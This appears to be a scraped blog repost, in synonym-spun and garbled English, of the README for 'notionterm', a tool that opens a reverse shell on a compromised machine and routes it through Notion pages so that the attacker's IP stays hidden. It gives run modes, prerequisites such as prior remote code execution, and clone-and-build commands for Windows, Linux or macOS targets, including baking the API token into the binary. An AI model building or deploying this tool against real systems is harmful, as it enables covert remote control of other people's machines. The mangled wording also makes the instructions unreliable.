Friday, June 3, 2022
HomeHackerEmbed Reverse Shell In Notion Pages

Embed Reverse Shell In Notion Pages




FOR:

  • Hiding attacker IP in reverse shell (No direct interplay between attacker and goal machine. Notion is used as a proxy internet hosting the reverse shell)
  • Demo/Fast proof insertion inside report
  • Excessive accessible and shareable reverse shell (desktop, browser, cell)
  • Encrypted and authenticated distant shell

NOT FOR:

  • Lengthy and interactive shell session (see tacos for that)

Why?

The main target was on making one thing enjoyable whereas nonetheless being usable, however that is not meant to be THE answer for reverse shell within the pentester’s arsenal

How?

Simply use notion as traditional and launch notionterm on course.

Necessities

  • Notion software program and API key
  • Allowed HTTP communication from the goal to the notion area
  • Prior RCE on course

roughly impressed by the good concept of OffensiveNotion and notionion!

Quickstart

Set-up

  1. Create a web page and provides to the mixing API key the permissions to have web page write entry
  2. Construct notionterm and switch it on course machine (see set up)

Run

There are 3 principal methods to run notionterm:

“regular” mode
Get terminal, cease/unstop it, and many others…

notionterm [flags]
Begin the shell with the button widget: flip ON, do you reverse shell stuff, flip OFF to pause, flip ON to renew and many others…

“server” mode
Ease notionterm embedding in any web page

notionterm --server [flags]
Begin a shell session in any web page by creating an embed block with URL containing the web page id (CTRL+Lto get it): https://[TARGET_URL]/notionterm?url=[NOTION_PAGE_ID].

mild mode
Solely carry out HTTP visitors from goal → notion

notionterm mild [flags]

Set up

As notionterm is aimed to be run on course machine it should be constructed to suit with it.

Thus set env var to suit with the goal requirement:

GOOS=[windows/linux/darwin]

Easy construct

git clone https://github.com/ariary/notionterm.git && cd notionterm
GOOS=$GOOS go construct notionterm.go

You have to to set API key and notion web page URL utilizing both env var (NOTION_TOKEN & NOTION_PAGE_URL) or flags (--token & --page-url)

“All-inclusive” construct

Embed immediately the notion integration API token and notion web page url within the binary.

everyone with entry to the binary can retrieved the token. For safety cause do not share it and take away it after use.

Set in accordance env var:

export NOTION_PAGE_URL=[NOTION_PAGE_URL]
export NOTION_TOKEN=[INTEGRATION_NOTION_TOKEN]

And construct it:

git clone https://github.com/ariary/notionterm.git && cd notionterm
./static-build.sh $NOTION_PAGE_URL $NOTION_TOKEN $GOOS go construct notionterm.go



RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments